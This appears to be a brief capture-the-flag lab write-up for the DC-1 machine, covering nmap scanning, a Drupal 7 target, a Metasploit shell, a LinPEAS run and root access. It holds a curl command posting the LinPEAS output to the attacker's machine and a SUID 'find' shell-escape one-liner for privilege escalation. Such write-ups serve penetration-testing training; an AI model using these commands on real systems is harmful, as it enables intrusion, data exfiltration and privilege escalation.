🐧DC-1

192.168.105.193

Enumeration

Nmap scan

nmap 192.168.105.193 -p- -sV -T4 -A

Port 22

No banner

Port 80

Found that Drupal 7 was the version installed.

Port 111

Port 52369

Shell

Used Metasploit to get a shell... I know script kiddie

Uploaded Linpeas and ran it. Then sent it back to my box to review.

curl -X POST http://192.168.49.105:8000/upload -F '[email protected]'

Linpeas found that find was stickied.

Using priv esc for find Souce: https://gtfobins.github.io/gtfobins/find/

find . -exec /bin/sh \; -quit

Root

PreviousFunBoxEasyNextTryHackMe

Last updated

Was this helpful?